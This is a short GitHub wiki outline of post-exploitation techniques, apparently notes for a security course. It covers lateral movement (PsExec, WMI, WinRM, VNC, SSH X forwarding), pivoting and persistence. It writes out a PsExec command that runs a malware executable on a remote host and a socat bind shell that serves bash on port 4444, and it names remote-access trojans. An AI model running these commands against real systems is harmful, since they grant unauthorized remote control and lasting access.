Post Exploitation - Paiet/SEC-335 GitHub Wiki

  • Lateral movement

    • CLI Shell Access
      • RSH/Rlogin
      • Telnet
      • SSH
    • Remote Management Services
      • Blackhat pdf: https://tinyurl.com/gu5zduj
      • RPC/DCOM
      • PsExec
        • Uses SMB to issue commands
        • psexec \\10.0.0.224 -s "C:\malware.exe"
      • Windows Remote Management(WinRM)/WMI
        • wmic /node:10.0.0.224 computersystem get username
      • Scheduled tasks
      • PS remoting/WinRM
        • Invoke-Command -ComputerName 10.0.0.224 -ScriptBlock { Get-ChildItem C:\Windows\System32 }
    • GUI Shell
      • RDP
      • Apple Remote Desktop
      • VNC
        • vncviewer 10.0.0.165
        • Password = "password"
      • X-server forwarding
        • ssh -X 10.0.0.165
        • Run X program
          • xcalc
          • x-www-browser
  • Pivoting

    • Proxychains
  • Persistence

    • Scheduled jobs
    • Scheduled tasks
    • Daemons
      • nuhup socat TCP-LISTEN:4444,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane &
    • Back doors
    • Trojan
      • RAT
        • Sub7, DarkComet, TheFatRAT, Pupy,
    • New user creation